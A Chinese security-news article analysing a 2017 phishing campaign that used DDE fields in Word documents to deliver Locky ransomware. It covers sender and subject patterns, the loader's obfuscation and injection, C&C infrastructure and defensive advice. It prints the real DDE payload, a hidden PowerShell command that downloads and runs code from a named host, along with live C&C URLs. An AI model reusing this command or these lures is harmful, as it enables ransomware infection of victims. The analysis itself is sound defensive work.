freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    利用DDE钓鱼文档传播勒索病毒事件分析
    2017-10-30 13:13:05

    概述

    近日,腾讯反病毒实验室发现利用DDE的勒索邮件正大规模爆发。DDE代码执行利用攻击原理为,微软动态数据交换(DDE)属性允许Office应用程序从其他程序中加载数据。而黑客正是利用DDE这种天然属性,在Office应用程序中加载执行恶意代码。尽管DDE做为一项老功能已被较新的对象链接与嵌入(OLE)工具包所取代,但Office应用程序出于兼容的考虑仍然支持DDE功能。(关于DDE攻击技术的介绍请参考之前的文章:无需开启宏即可渗透:在Office文档中利用DDE执行命令

    在这波攻击事件中,黑客的攻击流程如下:黑客使用发票等主题的钓鱼邮件为初始载荷发起攻击,当文档中的DDE代码获得运行后,DDE代码会调用powershell尝试从多个不同的C&C服务器下载loader程序,loader程序会与C&C通信下载勒索软件并加载执行,最终加密用户电脑数据以达到破坏数据勒索钱财的目的。

    从时间维度来看,2017年10月9日DDE执行代码的技术细节被公开,从腾讯反病毒实验室的安全大数据可以看到在细节被公开的前两天中,鲜有恶意文档利用这种技术,但随着时间的推移,这种利用方式受到越来越多黑客们的青睐。

    下图为腾讯反病毒实验室最近截获的利用DDE代码执行的恶意文档趋势图。

    1.png

    钓鱼邮件特征

    钓鱼邮件使用伪造的发件人地址,发件人地址呈现一定的规律:通常为一个男性的名字,后面跟随机数字组成的邮箱名称,如Shelby.0648@staff.XXXXXX.com

    在这次攻击事件中,我们得到的发件人包括:

    Angie <Angie.39@XXXXXX.com>

    Beatrice <Beatrice.827@XXXXXX.com>

    Brooke Calder <Brooke@XXXXXX.com>

    Cynthia <Cynthia.2267@XXXXXX.com>

    Daphne <Daphne.752@XXXXXX.com>

    Eddie <Eddie.56@XXXXXX.com>

    Eliza <Eliza.7193@XXXXXX.com>

    Felecia <Felecia.05@XXXXXX.com>

    Holly <Holly.40@XXXXXX.com>

    Jacqueline<Jacqueline.220@staff.XXXXXX.com>

    Julian Seward <Julian@XXXXXX.com>

    Latisha Neville <Latisha@XXXXXX.com>

    Leann <Leann.98@staff.XXXXXX.com>

    Phoebe <Phoebe.406@XXXXXX.com>

    Shelby <Shelby.0648@staff.XXXXXX.com>

    Zelma Zelma.07@staff.XXXXXX.com

    此外,邮件主题也多为与发票,文档有关的内容,已知的邮件主题包括:

    DC0007096.doc (其中的7096可以为其他4位随机数字)

    Emailed Invoice - 385663(其中385663可以为其他的6位随机数字)

    Invoice

    Order

    Paper

    Receipt

    Scan

    Scanned document

    Documents

    而做为邮件的内容部分,则常保持为空白内容。

    技术分析:

    Word文档:

    受害者下载并点击了附件中的Office文档,Office就会显示下面的提示

    2.png

    当用户点击了“是”后,WORD文档会通过CMD运行powershell命令:

    3.png

    对文档分析,可以看到DDE内容为:

    DDE C:\\Windows\\System32\\cmd.exe "/kpowershell -NoP -sta -NonI -w hidden $e=(New-ObjectSystem.Net.WebClient).DownloadString('http://vithos.de/hjergf76');powershell -e$e "  

    在这个过程中的进程执行链如下:

    4.png

    Powershell功能

    Powershell会从http://vithos.de/hjergf76中下载一段base64过的代码,解码后的功能为:依次尝试连接URL列表中的每个URL,下载一个loader到本地后执行。Base64解码后的内容为

    5.png

    loader&ransomware分析

    loader首先将编码的数据进行解码,然后到解码后的代码执行。以我们分析的样本为例,硬编码的数据位于0x30362A4地址处,大小为0x4AF8字节。

    6.png

    使用到的解码算法如下:

    7.png

    代码中使用了花指令混淆,如下面的代码本来可以直接调用sub_157408函数执行,而程序作者却先通过一些无关紧要的判断后到该函数执行。通过GetFileAttributesA获得一个不存在的文件apfHQ的文件属性,函数返回值永远为-1,所以当v8计数器>1时就会继续到sub_157408处运行。

    8.png

    sub_157408功能经过类似的混淆:注册一个窗口类后,使用PostMessageA函数向窗口发送0X1024号MSG(wParam和lParam分别为100,500),并随后使用GetMessage得到这个消息后,继续运行后面的代码

    9.png

    进行base64解码后,到解码后的地方执行

    10.png

    开启线程进行进程检测:通过计算进程名的hash值,与程序硬编码的hash进行比较,以此做为虚拟机对抗等。

    11.png

    12.png

     13.png

    代码最终会解密出PE文件,将该PE文件注入到傀儡进程中执行

    14.png

    最后注入傀儡进程中的代码向下面的C&C发送请求,读取加密内容。

    http://sergiocarfagna.it/SLyhe6.enc 

    http://axtes.com/SLyhe6.enc

    随后会与http://gdiscoun.org进行通信。目前http://gdiscoun.org地址的DNS已经被解析到了google.com。

    将读取的加密内容解密后就是locky家族的勒索软件。Locky运行后的截图如下:

    15.png


    C&C地址分析

    根据腾讯反病毒实验室的安全数据分析,对于此波攻击事件中的攻击者的基础设施情况,我们得到以下结论:

    1.    将每个攻击文档的利用过程中都使用了大量的C&C地址。基本上对于每个攻击文档可以提取出9个C&C地址,其中word阶段为1个,powershell阶段为5个,loader阶段为3个。在对此波攻击范围中的多个文档样本分析后发现,在powershell阶段使用的C&C地址大部分都是相同的。

    2.    不同的攻击文档,在不同的阶段可以使用相同的C&C。

    如arkberg-design.fi这个地址,既是文档1(MD5: 0910541c2ac975a49a28d7a939e48cd3)的word阶段的C&C,也是文档2(MD5:f5564925dd68e23672d898e0a590340e)的powershell阶段的C&C。

    3.    不同的攻击文档,在相同的阶段可以使用不同的C&C,但这些C&C位于相同的IP地址中。

    如在文档1(MD5:fd5d0801d9470908090dcd36ae88e96c)使用的C&C地址为pdj.co.id,而文档2(MD5: 96284109c58728ed0b7e4a1229825448)的word阶段都使用的C&C地址为vithos.de,但pdj.co.id和vithos.de都位于相同的IP(87.106.30.57)中。

    4.    C&C地址的域名并不都是攻击者的基础设施,有一部分为被攻击者非法控制的正常网站。其中一部分被利用的网站的首页界面都如下图所示。攻击者控制这些正常网站后,会将恶意内容放在网站的指定路径下。此后,恶意程序会连接该URL从而串联起整个攻击流程。

    16.png

    被利用的正常网站域名包括:

    pdj.co.id
    accessyouraudience.com
    deltasec.net
    basedow-bilder.de
    pragmaticinquiry.org
    shamanic-extracts.biz

    防范建议

    攻击者在攻击过程中使用了钓鱼邮件做为攻击的最初载荷。因此做好企业安全教育,不随意打开陌生人发送的文件可以最快的阻断攻击。

    建议用户尽快排查自身网络内是否有C&C地址的访问,一旦发现有终端主机对上述地C&C地址发起请求连接则极有可能已经沦陷。同时建议用户安装腾讯电脑管家等终端安全产品,保持终端安全产品的及时更新从而达到有效防护。

    目前,腾讯电脑管家和哈勃分析系统(https://habo.qq.com/)已经能够识别和查杀此类文档文件和loader程序。

    17.png

    18.png

    参考:

    https://myonlinesecurity.co.uk/more-locky-ransomware-delivered-via-dde-exploit-pretending-to-come-from-your-own-company-or-email-address/

    https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

    https://www.virustotal.com/en/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/


    本文作者:, 转载请注明来自FreeBuf.COM

    # 勒索病毒 # 腾讯反病毒实验室哈勃系统
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    评论 按时间排序

    登录/注册后在FreeBuf发布内容哦

    相关推荐
    • 0 文章数
    • 0 评论数
    • 0 关注者
    登录 / 注册后在FreeBuf发布内容哦
    收入专辑